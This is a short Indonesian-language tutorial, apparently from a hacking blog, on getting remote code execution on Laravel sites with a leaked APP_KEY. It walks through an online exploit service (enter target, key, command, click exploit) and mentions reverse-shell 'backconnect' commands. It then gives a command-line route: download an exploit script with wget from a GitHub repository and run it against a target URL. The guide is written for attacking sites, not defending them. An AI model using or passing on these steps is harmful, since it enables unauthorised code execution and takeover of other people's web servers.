Laravel RCE via Web Apps
1.Masuk ke https://exploit.anons79.com/
2.Masukkan target (perhatikan penggunaan www,http,dan https)
3.Masukkan APP_KEY yang kalian dapat
4.Masukkan command (kalo saya seringkali dengan ls)
5.Klik exploit
Jika kalian ini melakukan backconnect kalian bisa menggunakan command disini
*note:
Tidak semua APP_KEY pada laravel yang rentan terhadap ini, bisa saja hanya karna perbedaan versi Laravel...
Laravel RCE via terminal ( CLI )
download tools
download tools
wget https://raw.githubusercontent.com/wibuheker/exploit/master/php/laravel/rce.php
kemudian jalankan toolsnya
kemudian jalankan toolsnya
php rce.php url=http://target.com/ method=1
Source : nakanosec
Contact : ncdream72@gmail.com
EmoticonEmoticon